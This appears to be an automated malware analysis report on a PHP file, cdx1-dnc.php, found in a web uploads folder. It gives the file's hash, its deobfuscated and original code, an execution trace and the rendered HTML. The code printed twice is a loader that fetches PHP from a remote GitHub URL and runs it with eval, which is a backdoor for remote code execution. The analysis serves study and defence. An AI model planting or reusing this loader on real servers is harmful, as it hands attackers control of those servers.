PHP Malware Analysis

cdx1-dnc.php

md5: 90bc3f7090dc3996c4f2e1b39ec04eac

Deobfuscated PHP code

<html>
<head>
<title>CODEX CYBER ARMY</title>
<link rel="shortcut icon" href="https://i.imgur.com/mL4nqp6.png" type="image/x-icon">
<meta name='author' content='CODEX'>
<link rel="shortcut icon" href="CODEX">
<meta http-equiv="Cache-Control" content="no-store" />
<meta charset="UTF-8">
</head>
<?php 
echo eval("?>" . file_get_contents("https://raw.githubusercontent.com/haxxorteam/haxxor/main/cdx.php"));

Execution traces

data/traces/90bc3f7090dc3996c4f2e1b39ec04eac_trace-1676237492.9991.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:31:58.896960]
1	0	1	0.000134	393528
1	3	0	0.000181	394016	{main}	1		/var/www/html/uploads/cdx1-dnc.php	0	0
2	4	0	0.000198	394016	file_get_contents	0		/var/www/html/uploads/cdx1-dnc.php	10	1	'https://raw.githubusercontent.com/haxxorteam/haxxor/main/cdx.php'
2	4	1	0.038047	397104
2	4	R			'CODEX SERVER MAINTENANCE\r\n'
2	5	0	0.038105	397568	eval	1	'?>CODEX SERVER MAINTENANCE\r\n'	/var/www/html/uploads/cdx1-dnc.php	10	0
2	5	1	0.038124	397568
2	5	R			NULL
1	3	1	0.038139	397144
			0.038182	317176
TRACE END   [2023-02-12 19:31:58.935034]


Generated HTML code

<html><head>
<title>CODEX CYBER ARMY</title>
<link rel="shortcut icon" href="https://i.imgur.com/mL4nqp6.png" type="image/x-icon">
<meta name="author" content="CODEX">
<link rel="shortcut icon" href="CODEX">
<meta http-equiv="Cache-Control" content="no-store">
<meta charset="UTF-8">
</head>
<body>CODEX SERVER MAINTENANCE
</body></html>

Original PHP code

<html>
<head>
<title>CODEX CYBER ARMY</title>
<link rel="shortcut icon" href="https://i.imgur.com/mL4nqp6.png" type="image/x-icon">
<meta name='author' content='CODEX'>
<link rel="shortcut icon" href="CODEX">
<meta http-equiv="Cache-Control" content="no-store" />
<meta charset="UTF-8">
</head>
<?=eval("?>".file_get_contents("https://raw.githubusercontent.com/haxxorteam/haxxor/main/cdx.php"));?>